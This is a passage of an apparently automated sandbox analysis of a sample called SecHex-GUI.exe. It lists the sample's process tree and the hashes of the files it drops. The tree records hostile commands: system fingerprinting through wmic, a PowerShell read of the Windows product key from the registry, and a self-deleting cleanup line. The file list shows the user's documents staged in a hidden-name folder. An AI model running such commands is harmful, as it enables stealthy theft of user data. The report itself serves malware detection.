                                                                          PID:2444
                                                                      • C:\Windows\system32\cmd.exe
                                                                        C:\Windows\system32\cmd.exe /c "wmic os get Caption"
                                                                        3⤵
                                                                          PID:1416
                                                                          • C:\Windows\System32\Wbem\WMIC.exe
                                                                            wmic os get Caption
                                                                            4⤵
                                                                              PID:3096
                                                                          • C:\Windows\system32\cmd.exe
                                                                            C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
                                                                            3⤵
                                                                              PID:368
                                                                              • C:\Windows\System32\Wbem\WMIC.exe
                                                                                wmic computersystem get totalphysicalmemory
                                                                                4⤵
                                                                                  PID:1484
                                                                              • C:\Windows\system32\cmd.exe
                                                                                C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                                                                                3⤵
                                                                                  PID:2296
                                                                                  • C:\Windows\System32\Wbem\WMIC.exe
                                                                                    wmic csproduct get uuid
                                                                                    4⤵
                                                                                      PID:1852
                                                                                  • C:\Windows\system32\cmd.exe
                                                                                    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
                                                                                    3⤵
                                                                                      PID:4956
                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
                                                                                        4⤵
                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                        PID:4360
                                                                                    • C:\Windows\system32\cmd.exe
                                                                                      C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
                                                                                      3⤵
                                                                                        PID:1896
                                                                                        • C:\Windows\System32\Wbem\WMIC.exe
                                                                                          wmic path win32_VideoController get name
                                                                                          4⤵
                                                                                          • Detects videocard installed
                                                                                          PID:516
                                                                                      • C:\Windows\system32\cmd.exe
                                                                                        C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
                                                                                        3⤵
                                                                                          PID:3240
                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
                                                                                            4⤵
                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                            PID:876
                                                                                        • C:\Windows\system32\cmd.exe
                                                                                          C:\Windows\system32\cmd.exe /c "ping localhost -n 3 > NUL && del /A H /F "C:\Users\Admin\AppData\Local\Temp\SecHex-GUI.exe""
                                                                                          3⤵
                                                                                          • System Network Configuration Discovery: Internet Connection Discovery
                                                                                          PID:1752
                                                                                          • C:\Windows\system32\PING.EXE
                                                                                            ping localhost -n 3
                                                                                            4⤵
                                                                                            • System Network Configuration Discovery: Internet Connection Discovery
                                                                                            • Runs ping.exe
                                                                                            PID:2796
                                                                                    • C:\Windows\system32\svchost.exe
                                                                                      C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
                                                                                      1⤵
                                                                                        PID:4432

                                                                                      Network

                                                                                      MITRE ATT&CK Enterprise v15

                                                                                      Replay Monitor

                                                                                      Loading Replay Monitor...

                                                                                      Downloads

                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                                                                                        Filesize

                                                                                        2KB

                                                                                        MD5

                                                                                        d85ba6ff808d9e5444a4b369f5bc2730

                                                                                        SHA1

                                                                                        31aa9d96590fff6981b315e0b391b575e4c0804a

                                                                                        SHA256

                                                                                        84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

                                                                                        SHA512

                                                                                        8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                        Filesize

                                                                                        944B

                                                                                        MD5

                                                                                        d28a889fd956d5cb3accfbaf1143eb6f

                                                                                        SHA1

                                                                                        157ba54b365341f8ff06707d996b3635da8446f7

                                                                                        SHA256

                                                                                        21e5d7ccf80a293e6ba30ed728846ca19c929c52b96e2c8d34e27cd2234f1d45

                                                                                        SHA512

                                                                                        0b6d88deb9be85722e6a78d5886d49f2caf407a59e128d2b4ed74c1356f9928c40048a62731959f2460e9ff9d9feee311043d2a37abe3bb92c2b76a44281478c

                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                        Filesize

                                                                                        944B

                                                                                        MD5

                                                                                        3072fa0040b347c3941144486bf30c6f

                                                                                        SHA1

                                                                                        e6dc84a5bd882198583653592f17af1bf8cbfc68

                                                                                        SHA256

                                                                                        da8b533f81b342503c109e46b081b5c5296fdad5481f93fe5cc648e49ca6238e

                                                                                        SHA512

                                                                                        62df0eed621fe8ec340887a03d26b125429025c14ddcdfef82cb78ce1c9c6110c1d51ff0e423754d7966b6251363bf92833970eaf67707f8dd62e1549a79536c

                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                        Filesize

                                                                                        1KB

                                                                                        MD5

                                                                                        9e00b911a1da61849ab6f0474679b2b2

                                                                                        SHA1

                                                                                        fd5ae9ed554998c2fd3c980be05d596e9a920b19

                                                                                        SHA256

                                                                                        e1687531ba56e8f1510df31d433b3138e845e382e317993dc13d806770bc4aea

                                                                                        SHA512

                                                                                        d02783484976917e8fbb115d49c305723c280a9cf25baa7d97c81cb17704d5c94a8f0ccdb4fc35ff9bbbdd00280e9e51a7adae725cb318bde1db338468f82b1c

                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                        Filesize

                                                                                        1KB

                                                                                        MD5

                                                                                        276798eeb29a49dc6e199768bc9c2e71

                                                                                        SHA1

                                                                                        5fdc8ccb897ac2df7476fbb07517aca5b7a6205b

                                                                                        SHA256

                                                                                        cd0a1056e8f1b6cb5cb328532239d802f4e2aa8f8fcdc0fcb487684bd68e0dcc

                                                                                        SHA512

                                                                                        0d34fce64bbefc57d64fa6e03ca886952263d5f24df9c1c4cce6a1e8f5a47a9a21e9820f8d38caa7f7b43a52336ce00b738ea18419aaa7c788b72e04ce19e4f2

                                                                                      • C:\Users\Admin\AppData\Local\Temp\RES95B8.tmp

                                                                                        Filesize

                                                                                        1KB

                                                                                        MD5

                                                                                        31094dbd151a21f1d0351bc70ac1bbf1

                                                                                        SHA1

                                                                                        ce1b3f9eaad1bd67fc076420f1a74e7cca8b85b3

                                                                                        SHA256

                                                                                        4d61b8cc69341335747b00161809c534286d4383599752899fe8e6db03c4a316

                                                                                        SHA512

                                                                                        444ba9fdbcccd28bb8258776b63c4ff480ad08fe3055415cb7c8a76a7594b88a43a674ebd661d2ea06cb1ae37f882b65d820c82e22c4e904f0e40780755efefa

                                                                                      • C:\Users\Admin\AppData\Local\Temp\_MEI35402\VCRUNTIME140.dll

                                                                                        Filesize

                                                                                        95KB

                                                                                        MD5

                                                                                        f34eb034aa4a9735218686590cba2e8b

                                                                                        SHA1

                                                                                        2bc20acdcb201676b77a66fa7ec6b53fa2644713

                                                                                        SHA256

                                                                                        9d2b40f0395cc5d1b4d5ea17b84970c29971d448c37104676db577586d4ad1b1

                                                                                        SHA512

                                                                                        d27d5e65e8206bd7923cf2a3c4384fec0fc59e8bc29e25f8c03d039f3741c01d1a8c82979d7b88c10b209db31fbbec23909e976b3ee593dc33481f0050a445af

                                                                                      • C:\Users\Admin\AppData\Local\Temp\_MEI35402\_bz2.pyd

                                                                                        Filesize

                                                                                        44KB

                                                                                        MD5

                                                                                        c24b301f99a05305ac06c35f7f50307f

                                                                                        SHA1

                                                                                        0cee6de0ea38a4c8c02bf92644db17e8faa7093b

                                                                                        SHA256

                                                                                        c665f60b1663544facf9a026f5a87c8445558d7794baff56e42e65671d5adc24

                                                                                        SHA512

                                                                                        936d16fea3569a32a9941d58263e951623f4927a853c01ee187364df95cd246b3826e7b8423ac3c265965ee8e491275e908ac9e2d63f3abc5f721add8e20f699

                                                                                      • C:\Users\Admin\AppData\Local\Temp\_MEI35402\_ctypes.pyd

                                                                                        Filesize

                                                                                        55KB

                                                                                        MD5

                                                                                        5c0bda19c6bc2d6d8081b16b2834134e

                                                                                        SHA1

                                                                                        41370acd9cc21165dd1d4aa064588d597a84ebbe

                                                                                        SHA256

                                                                                        5e7192c18ad73daa71efade0149fbcaf734c280a6ee346525ea5d9729036194e

                                                                                        SHA512

                                                                                        b1b45fcbb1e39cb6ba7ac5f6828ee9c54767eabeedca35a79e7ba49fd17ad20588964f28d06a2dcf8b0446e90f1db41d3fca97d1a9612f6cc5eb816bd9dcdf8a

                                                                                      • C:\Users\Admin\AppData\Local\Temp\_MEI35402\_decimal.pyd

                                                                                        Filesize

                                                                                        102KB

                                                                                        MD5

                                                                                        604154d16e9a3020b9ad3b6312f5479c

                                                                                        SHA1

                                                                                        27c874b052d5e7f4182a4ead6b0486e3d0faf4da

                                                                                        SHA256

                                                                                        3c7585e75fa1e8604d8c408f77995b30f90c54a0f2ff5021e14fa7f84e093fb6

                                                                                        SHA512

                                                                                        37ce86fd8165fc51ebe568d7ce4b5ea8c1598114558d9f74a748a07dc62a1cc5d50fe1448dde6496ea13e45631e231221c15a64cebbb18fa96e2f71c61be0db4

                                                                                      • C:\Users\Admin\AppData\Local\Temp\_MEI35402\_hashlib.pyd

                                                                                        Filesize

                                                                                        32KB

                                                                                        MD5

                                                                                        8ba5202e2f3fb1274747aa2ae7c3f7bf

                                                                                        SHA1

                                                                                        8d7dba77a6413338ef84f0c4ddf929b727342c16

                                                                                        SHA256

                                                                                        0541a0028619ab827f961a994667f9a8f1a48c8b315f071242a69d1bd6aeab8b

                                                                                        SHA512

                                                                                        d19322a1aba0da1aa68e24315cdbb10d63a5e3021b364b14974407dc3d25cd23df4ff1875b12339fd4613e0f3da9e5a78f1a0e54ffd8360ed764af20c3ecbb49

                                                                                      • C:\Users\Admin\AppData\Local\Temp\_MEI35402\_lzma.pyd

                                                                                        Filesize

                                                                                        82KB

                                                                                        MD5

                                                                                        215acc93e63fb03742911f785f8de71a

                                                                                        SHA1

                                                                                        d4e3b46db5d4fcdd4f6b6874b060b32a4b676bf9

                                                                                        SHA256

                                                                                        ffdbe11c55010d33867317c0dc2d1bd69f8c07bda0ea0d3841b54d4a04328f63

                                                                                        SHA512

                                                                                        9223a33e8235c566d280a169f52c819a83c3e6fa1f4b8127dde6d4a1b7e940df824ccaf8c0000eac089091fde6ae89f0322fe62e47328f07ea92c7705ace4a72

                                                                                      • C:\Users\Admin\AppData\Local\Temp\_MEI35402\_queue.pyd

                                                                                        Filesize

                                                                                        22KB

                                                                                        MD5

                                                                                        7b9f914d6c0b80c891ff7d5c031598d9

                                                                                        SHA1

                                                                                        ef9015302a668d59ca9eb6ebc106d82f65d6775c

                                                                                        SHA256

                                                                                        7f80508edff0896596993bf38589da38d95bc35fb286f81df361b5bf8c682cae

                                                                                        SHA512

                                                                                        d24c2ff50649fe604b09830fd079a6ad488699bb3c44ea7acb6da3f441172793e6a38a1953524f5570572bd2cf050f5fee71362a82c33f9bb9381ac4bb412d68

                                                                                      • C:\Users\Admin\AppData\Local\Temp\_MEI35402\_socket.pyd

                                                                                        Filesize

                                                                                        39KB

                                                                                        MD5

                                                                                        1f7e5e111207bc4439799ebf115e09ed

                                                                                        SHA1

                                                                                        e8b643f19135c121e77774ef064c14a3a529dca3

                                                                                        SHA256

                                                                                        179ebbe9fd241f89df31d881d9f76358d82cedee1a8fb40215c630f94eb37c04

                                                                                        SHA512

                                                                                        7f8a767b3e17920acfaafd4a7ed19b22862d8df5bdf4b50e0d53dfbf32e9f2a08f5cde97acecb8abf8f10fbbedb46c1d3a0b9eb168d11766246afe9e23ada6fd

                                                                                      • C:\Users\Admin\AppData\Local\Temp\_MEI35402\_sqlite3.pyd

                                                                                        Filesize

                                                                                        47KB

                                                                                        MD5

                                                                                        e5111e0cb03c73c0252718a48c7c68e4

                                                                                        SHA1

                                                                                        39a494eefecb00793b13f269615a2afd2cdfb648

                                                                                        SHA256

                                                                                        c9d4f10e47e45a23df9eb4ebb4c4f3c5153e7977dc2b92a1f142b8ccdb0bb26b

                                                                                        SHA512

                                                                                        cc0a00c552b98b6b80ffa4cd7cd20600e0e368fb71e816f3665e19c28ba9239fb9107f7303289c8db7de5208aaef8cd2159890996c69925176e6a04b6becc9b1

                                                                                      • C:\Users\Admin\AppData\Local\Temp\_MEI35402\_ssl.pyd

                                                                                        Filesize

                                                                                        59KB

                                                                                        MD5

                                                                                        a65b98bf0f0a1b3ffd65e30a83e40da0

                                                                                        SHA1

                                                                                        9545240266d5ce21c7ed7b632960008b3828f758

                                                                                        SHA256

                                                                                        44214a85d06628eb3209980c0f2b31740ab8c6eb402f804816d0dae1ec379949

                                                                                        SHA512

                                                                                        0f70c2722722eb04b0b996bbaf7129955e38425794551c4832baec8844cde9177695d4045c0872a8fb472648c62c9bd502c9240facca9fb469f5cbacbe3ca505

                                                                                      • C:\Users\Admin\AppData\Local\Temp\_MEI35402\base_library.zip

                                                                                        Filesize

                                                                                        859KB

                                                                                        MD5

                                                                                        e9addf5576e6ddeb6b1755c02854eb14

                                                                                        SHA1

                                                                                        3384f1bd2df8e209ae627ee3588cd5d1d5f33e33

                                                                                        SHA256

                                                                                        ab94e5a1d8993cef46b88b370db53dc128dc4b3bba742215960347bfcb3cad69

                                                                                        SHA512

                                                                                        47f9b857eb63c2ec8eeff6438f0308b8904cf40629a561e596376d48da8d3a7b07917897617ef64f1624330d795dabf4d743a570c3e3d22144675c75c6e6cc97

                                                                                      • C:\Users\Admin\AppData\Local\Temp\_MEI35402\blank.aes

                                                                                        Filesize

                                                                                        77KB

                                                                                        MD5

                                                                                        913b1e5b195e9e5cc5d6f4c25fd555f4

                                                                                        SHA1

                                                                                        04aac25992d8200afb1b8370d2ed59bd6051fca8

                                                                                        SHA256

                                                                                        045fa8544be2b50ac3fb705a0d8056dd651abf853b1faf6a4546f0e83fbd3425

                                                                                        SHA512

                                                                                        cd31448f5486a5584d081c26433b9db78ca8c1855dd0343fe6c2bbf914d6341e706b57e38aca89e4abd512084835db305293e805d06f361decbe3348b9bd7c29

                                                                                      • C:\Users\Admin\AppData\Local\Temp\_MEI35402\libcrypto-1_1.dll

                                                                                        Filesize

                                                                                        1.1MB

                                                                                        MD5

                                                                                        3cc020baceac3b73366002445731705a

                                                                                        SHA1

                                                                                        6d332ab68dca5c4094ed2ee3c91f8503d9522ac1

                                                                                        SHA256

                                                                                        d1aa265861d23a9b76f16906940d30f3a65c5d0597107ecb3d2e6d470b401bb8

                                                                                        SHA512

                                                                                        1d9b46d0331ed5b95dda8734abe3c0bd6f7fb1ec9a3269feab618d661a1644a0dc3bf8ac91778d5e45406d185965898fe87abd3261a6f7f2968c43515a48562c

                                                                                      • C:\Users\Admin\AppData\Local\Temp\_MEI35402\libffi-7.dll

                                                                                        Filesize

                                                                                        23KB

                                                                                        MD5

                                                                                        6f818913fafe8e4df7fedc46131f201f

                                                                                        SHA1

                                                                                        bbb7ba3edbd4783f7f973d97b0b568cc69cadac5

                                                                                        SHA256

                                                                                        3f94ee4f23f6c7702ab0cc12995a6457bf22183fa828c30cc12288adf153ae56

                                                                                        SHA512

                                                                                        5473fe57dc40af44edb4f8a7efd68c512784649d51b2045d570c7e49399990285b59cfa6bcd25ef1316e0a073ea2a89fe46be3bfc33f05e3333037a1fd3a6639

                                                                                      • C:\Users\Admin\AppData\Local\Temp\_MEI35402\libssl-1_1.dll

                                                                                        Filesize

                                                                                        200KB

                                                                                        MD5

                                                                                        7f77a090cb42609f2efc55ddc1ee8fd5

                                                                                        SHA1

                                                                                        ef5a128605654350a5bd17232120253194ad4c71

                                                                                        SHA256

                                                                                        47b63a9370289d2544abc5a479bfb27d707ae7db4f3f7b6cc1a8c8f57fd0cf1f

                                                                                        SHA512

                                                                                        a8a06a1303e76c76d1f06b689e163ba80c1a8137adac80fab0d5c1c6072a69d506e0360d8b44315ef1d88cbd0c9ac95c94d001fad5bc40727f1070734bbbbe63

                                                                                      • C:\Users\Admin\AppData\Local\Temp\_MEI35402\python310.dll

                                                                                        Filesize

                                                                                        1.4MB

                                                                                        MD5

                                                                                        b93eda8cc111a5bde906505224b717c3

                                                                                        SHA1

                                                                                        5f1ae1ab1a3c4c023ea8138d4b09cbc1cd8e8f9e

                                                                                        SHA256

                                                                                        efa27cd726dbf3bf2448476a993dc0d5ffb0264032bf83a72295ab3fc5bcd983

                                                                                        SHA512

                                                                                        b20195930967b4dc9f60c15d9ceae4d577b00095f07bd93aa4f292b94a2e5601d605659e95d5168c1c2d85dc87a54d27775f8f20ebcacf56904e4aa30f1affba

                                                                                      • C:\Users\Admin\AppData\Local\Temp\_MEI35402\rar.exe

                                                                                        Filesize

                                                                                        615KB

                                                                                        MD5

                                                                                        9c223575ae5b9544bc3d69ac6364f75e

                                                                                        SHA1

                                                                                        8a1cb5ee02c742e937febc57609ac312247ba386

                                                                                        SHA256

                                                                                        90341ac8dcc9ec5f9efe89945a381eb701fe15c3196f594d9d9f0f67b4fc2213

                                                                                        SHA512

                                                                                        57663e2c07b56024aaae07515ee3a56b2f5068ebb2f2dc42be95d1224376c2458da21c965aab6ae54de780cb874c2fc9de83d9089abf4536de0f50faca582d09

                                                                                      • C:\Users\Admin\AppData\Local\Temp\_MEI35402\rarreg.key

                                                                                        Filesize

                                                                                        456B

                                                                                        MD5

                                                                                        4531984cad7dacf24c086830068c4abe

                                                                                        SHA1

                                                                                        fa7c8c46677af01a83cf652ef30ba39b2aae14c3

                                                                                        SHA256

                                                                                        58209c8ab4191e834ffe2ecd003fd7a830d3650f0fd1355a74eb8a47c61d4211

                                                                                        SHA512

                                                                                        00056f471945d838ef2ce56d51c32967879fe54fcbf93a237ed85a98e27c5c8d2a39bc815b41c15caace2071edd0239d775a31d1794dc4dba49e7ecff1555122

                                                                                      • C:\Users\Admin\AppData\Local\Temp\_MEI35402\select.pyd

                                                                                        Filesize

                                                                                        22KB

                                                                                        MD5

                                                                                        3cdfdb7d3adf9589910c3dfbe55065c9

                                                                                        SHA1

                                                                                        860ef30a8bc5f28ae9c81706a667f542d527d822

                                                                                        SHA256

                                                                                        92906737eff7ff33b9e2a72d2a86e4bd80a35018c8e40bb79433a8ea8ece3932

                                                                                        SHA512

                                                                                        1fe2c918e9ce524b855d7f38d4c69563f8b8c44291eea1dc98f04e5ebdc39c8f2d658a716429051fb91fed0b912520929a0b980c4f5b4ecb3de1c4eb83749a45

                                                                                      • C:\Users\Admin\AppData\Local\Temp\_MEI35402\sqlite3.dll

                                                                                        Filesize

                                                                                        612KB

                                                                                        MD5

                                                                                        59ed17799f42cc17d63a20341b93b6f6

                                                                                        SHA1

                                                                                        5f8b7d6202b597e72f8b49f4c33135e35ac76cd1

                                                                                        SHA256

                                                                                        852b38bd2d05dd9f000e540d3f5e4962e64597eb864a68aa8bb28ce7008e91f1

                                                                                        SHA512

                                                                                        3424ad59fd71c68e0af716b7b94c4224b2abfb11b7613f2e565f5d82f630e89c2798e732376a3a0e1266d8d58730b2f76c4e23efe03c47a48cbf5f0fc165d333

                                                                                      • C:\Users\Admin\AppData\Local\Temp\_MEI35402\unicodedata.pyd

                                                                                        Filesize

                                                                                        286KB

                                                                                        MD5

                                                                                        2218b2730b625b1aeee6a67095c101a4

                                                                                        SHA1

                                                                                        aa7f032b9c8b40e5ecf2a0f59fa5ae3f48eff90a

                                                                                        SHA256

                                                                                        5e9add4dd806c2de4d694b9bb038a6716badb7d5f912884d80d593592bcdb8ca

                                                                                        SHA512

                                                                                        77aa10ae645c0ba24e31dcab4726d8fb7aa3cb9708c7c85499e7d82ce46609d43e5dc74da7cd32c170c7ddf50c8db8945baf3452421316c4a46888d745de8da0

                                                                                      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_wlnsk1dz.pzf.ps1

                                                                                        Filesize

                                                                                        60B

                                                                                        MD5

                                                                                        d17fe0a3f47be24a6453e9ef58c94641

                                                                                        SHA1

                                                                                        6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                                                        SHA256

                                                                                        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                                                        SHA512

                                                                                        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                                                      • C:\Users\Admin\AppData\Local\Temp\wodhhjan\wodhhjan.dll

                                                                                        Filesize

                                                                                        4KB

                                                                                        MD5

                                                                                        b79c4dc07f215df8fb1f4a0b2477954b

                                                                                        SHA1

                                                                                        aa646481b4598aa9ede7bef7a345bbc572d2cf0c

                                                                                        SHA256

                                                                                        57fd86f2b367cdacd8cf048dd8e4b307df99f66dd76dc9e2a018f4864c30cf7c

                                                                                        SHA512

                                                                                        1cd13545103f5d2d01a9abea834490b6d534a001261171e119f0cd2b5d5927aeec59f93287c02581cd15543b491dcfc8bef2a67f26182d5d2324ccaa26156eda

                                                                                      • C:\Users\Admin\AppData\Local\Temp\ ‌‏‍      \Common Files\Desktop\CopySkip.xls

                                                                                        Filesize

                                                                                        973KB

                                                                                        MD5

                                                                                        36f7597131d93f28276680489b771906

                                                                                        SHA1

                                                                                        d5aff2b7f66b9c8c8f336dd036f8f601ceda0dc3

                                                                                        SHA256

                                                                                        5c9825f632ad3ba534573b2f1d4af400c3f2582aff13afe5890808a11180dfd0

                                                                                        SHA512

                                                                                        e01d9d0dda5c6ce4eef00906356cc18af4fed303f48cb4bf514a3f32b4f28227dda252bf1891f11a69d4e209d893edd2498730286194403b72fca3aa4c4c5a61

                                                                                      • C:\Users\Admin\AppData\Local\Temp\ ‌‏‍      \Common Files\Desktop\EnableBackup.mpeg

                                                                                        Filesize

                                                                                        644KB

                                                                                        MD5

                                                                                        b178919f7b80b47e11bd637100c753de

                                                                                        SHA1

                                                                                        e8481786a9c48bbbdef8b375ec52f227830aca20

                                                                                        SHA256

                                                                                        ab1c7bb36d0f220e23822e08ed96d551d166907f98a17ac4a731cf2cf8e88b58

                                                                                        SHA512

                                                                                        cc1bcb9ee93b0da24db4919b55e5ff21ec46df2a2a8cdad4b2a79205fd57049ae29610324823d76a2f216c83e8855ca68c4b498ecd32cad398310f9427477c25

                                                                                      • C:\Users\Admin\AppData\Local\Temp\ ‌‏‍      \Common Files\Desktop\HideUndo.txt

                                                                                        Filesize

                                                                                        619KB

                                                                                        MD5

                                                                                        28259380cff637764bec2ee9130ede13

                                                                                        SHA1

                                                                                        6f61145d3d4b35ce3149cba7fdc9d6b5901c101a

                                                                                        SHA256

                                                                                        7444c90d8608685fbbd992e1a91b86d330ed3c38317970de9883bc2182125123

                                                                                        SHA512

                                                                                        c5dc27266e5ff7c4f168865c19d9489b557f805417b33b9b65ddf42e3de161e6b51d5368e674a2fb3586fc0c00429850bea36af77d53c538a27c8f4e057e2a4a

                                                                                      • C:\Users\Admin\AppData\Local\Temp\ ‌‏‍      \Common Files\Desktop\JoinUpdate.xlsx

                                                                                        Filesize

                                                                                        11KB

                                                                                        MD5

                                                                                        d407135c123b6df07cf294f01b8c0132

                                                                                        SHA1

                                                                                        5671dbdcbed2ec078287255a21cfe58e1eeb1180

                                                                                        SHA256

                                                                                        1cf12aa9f6ade0a34f080d87e8aa7a366f3d5431f9e5b9002830960511966cca

                                                                                        SHA512

                                                                                        0d906463ec01d4b88575596845017c7438288269fc346ff0d5b83aa998991d77142f4015e883dbd51b3895004c67df32b513bacc12a2ea07c099daaa6b95c338

                                                                                      • C:\Users\Admin\AppData\Local\Temp\ ‌‏‍      \Common Files\Desktop\MergeNew.docx

                                                                                        Filesize

                                                                                        19KB

                                                                                        MD5

                                                                                        68ef5d9485eda961b294d8ad2970b3d9

                                                                                        SHA1

                                                                                        50a073c80173264612aef7fbfb670fd305b84fbb

                                                                                        SHA256

                                                                                        5cfdf62aa782f7e3a08911e3c1663e9c2881d990593fdeeafeffb9535d3f54dc

                                                                                        SHA512

                                                                                        bb5256dbf6e9436eb4460831d302b87acd1b4323d2b65c391dd154db470bb448d8e506669ddb76543e6597aae3e735fe9bb80b1d6c5a3748df6c4a2fb7da65a7

                                                                                      • C:\Users\Admin\AppData\Local\Temp\ ‌‏‍      \Common Files\Desktop\TestEnable.xlsx

                                                                                        Filesize

                                                                                        10KB

                                                                                        MD5

                                                                                        4fd369984bda72561754892e3251a6c8

                                                                                        SHA1

                                                                                        b5192feaabc36d546b7e3d1a3d9b01aa6a7fc1ec

                                                                                        SHA256

                                                                                        9b862229596bee726a8f2926bd514957e8265a2a4e06017b5ceb03d7eef493d4

                                                                                        SHA512

                                                                                        8577b6947ceffcaaa4faf398143dd587311ceb6924de18438d711f60f113d845b8ce136ddf60dfe9c3ea961d4ae08a9f69edd7145df247f2908f7fed5432cc70

                                                                                      • C:\Users\Admin\AppData\Local\Temp\ ‌‏‍      \Common Files\Documents\NewExport.xlsx

                                                                                        Filesize

                                                                                        12KB

                                                                                        MD5

                                                                                        6e56a205c69658f08fa0ca100507f0d8

                                                                                        SHA1

                                                                                        43e72ef7a0475df7c7c330cc0b4ddd5b68f44eec

                                                                                        SHA256

                                                                                        497b603fc9e8920ceb27ab255c7e00037daac76d874a002aa47359e1e944b2c7

                                                                                        SHA512

                                                                                        253eac54a670724d15e646dfa6599dfdc8d827a074d20399e918a11d550c7a1ad7a1ba7e2d121512f72026e23d0577975877cb1a4a616258a2938c3ed24e5c5b

                                                                                      • C:\Users\Admin\AppData\Local\Temp\ ‌‏‍      \Common Files\Documents\RequestSync.docx

                                                                                        Filesize

                                                                                        19KB

                                                                                        MD5

                                                                                        db2435362b66b7ab72b77db55597b2f7

                                                                                        SHA1

                                                                                        5a5c614cd985e70ca28e54f81550b3e285208f3f

                                                                                        SHA256

                                                                                        eb36fb05c205f7cbe3c5454bc8c1dac9a71afdd67dad75a071b36514c930227c

                                                                                        SHA512

                                                                                        6823e4e53f58577176cc7a07e150fd5cb2807ff5ed5872e6f929481e2fb013b82395aa0fa192ca45f33fce93d1dd9189d12849542ceb2b48ec008d9e7e7450d8

                                                                                      • C:\Users\Admin\AppData\Local\Temp\ ‌‏‍      \Common Files\Downloads\ConvertToBackup.css

                                                                                        Filesize

                                                                                        771KB

                                                                                        MD5

                                                                                        81cffe575a228480adaafc734bf0dd4f

                                                                                        SHA1

                                                                                        c01e63e1f88704802ddd2a3b51f7153ed8145d1c

                                                                                        SHA256

                                                                                        3c0cd8f7570ba42cd7677fdb8654a3cc9f5569e88321c59becfa92cd3affab99

                                                                                        SHA512

                                                                                        a27f0d152e536838e99fea9f37e824a565f54dff98f07f4a6b7bda1231d33e4b1d3896ee1ca97fec6e75ce83f35b892ac06ba8b31f5a6300613785322c8e1032

                                                                                      • C:\Users\Admin\AppData\Local\Temp\ ‌‏‍      \Common Files\Downloads\StepRead.jpeg

                                                                                        Filesize

                                                                                        1.1MB

                                                                                        MD5

                                                                                        52f61d794c7e93be26faa4d1d3e297d0

                                                                                        SHA1

                                                                                        098c238d88eaaebd8e5e40e8ddba914d2dcbfd4a

                                                                                        SHA256

                                                                                        a0cc77a3f8fca8924176d5916829d3e9ec101c41ed95880b0db89ebc52491eba

                                                                                        SHA512

                                                                                        481f61da3098bcec42dbb1ae44f3f069fa4544343ce12df61debb3be13bf05326af8367b57a601cd3b0dc58a9853ca92231f0f88a1849409456dd45a8fab5cba

                                                                                      • C:\Users\Admin\AppData\Local\Temp\ ‌‏‍      \Common Files\Downloads\SyncMeasure.jpeg

                                                                                        Filesize

                                                                                        554KB

                                                                                        MD5

                                                                                        343b5fb29c3e8fc2b9c962ed061c23b0

                                                                                        SHA1

                                                                                        86b0e3f0770a9b5b3d59a38e605b47dfcc400b9f

                                                                                        SHA256

                                                                                        74cd3397ed3294bc43e1961e4a9387b40f502bed23b7da1e8cb62f76e7472840

                                                                                        SHA512

                                                                                        4da763c2ce7a3e49a992b8c06cf6105be2bd0af06882a25d2a7f0c65b926381b64c2dd28502d6d4c92581dd9cef0293a72987bcb1ed274c1dfbdc7813bfac786

                                                                                      • C:\Users\Admin\AppData\Local\Temp\ ‌‏‍      \Common Files\Downloads\UnlockRestore.jpg

                                                                                        Filesize

                                                                                        923KB

                                                                                        MD5

                                                                                        b8c856a7bbfd7cf9f18a848b7f0a96c0

                                                                                        SHA1

                                                                                        d330ebe92baafec3bdbf741bb40acf2d03e3cecd

                                                                                        SHA256

                                                                                        c611a3afee9738619ecd092f6b2af7ba750bbcf4170c60c1bacb6ec86abfb81d

                                                                                        SHA512

                                                                                        edcdd5eac56fb7f6ea4675c3e0a1d7b9f0cb85de01eacecf81f9fc7fdb2f68388598f2f35a91e3837bac03405c6fede96a7fe9f77859a73fdb00e43bde5a8238

                                                                                      • C:\Windows\System32\drivers\etc\hosts

                                                                                        Filesize

                                                                                        2KB

                                                                                        MD5

                                                                                        f99e42cdd8b2f9f1a3c062fe9cf6e131

                                                                                        SHA1

                                                                                        e32bdcab8da0e3cdafb6e3876763cee002ab7307

                                                                                        SHA256

                                                                                        a040d43136f2f4c41a4875f895060fb910267f2ffad2e3b1991b15c92f53e0f0

                                                                                        SHA512

